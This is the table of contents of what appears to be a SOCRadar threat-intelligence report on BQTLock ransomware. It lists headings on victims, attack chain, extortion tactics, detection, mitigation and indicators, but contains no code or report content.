https://socradar.io/use-for-free/?utm_campaign=CountryIndustryReport&utm_source=Report&utm_medium=northamerica25&utm_term=FreeAccess&utm_content=FormSubmissions
Table of Contents

BQTLock Ransomware
Who is BQTLock Ransomware?
Victimology
Confirmed Victims
Target Industries
Target Countries
Modus Operandi
Decryption
Waves & Estimated Gains
Pricing & Affiliates
Technical Details
Binary Information
DLLs
Decryptor
Ransomware & Versions
Attack Chain
Initial Access
Execution
Reconnaissance
Privilege Escalation
Command and Control (C2)
Impact
Builder
Special Features
Extortion Methods
    Double and Triple Extortion
    Pressure Warfare & Psychological Tactics
Threat Intelligence Implications
    Insights Into the Future of RaaS based on BQTLOCK
    Trends: Hybrid Groups
    Recommendations
    Detection
    Response & Mitigation
    Preventive Mitigation
Further Intelligence Feed
    Panel
    Telegram & Discord
Conclusion
MITRE ATT&CK TTPs
IOCs
External Resources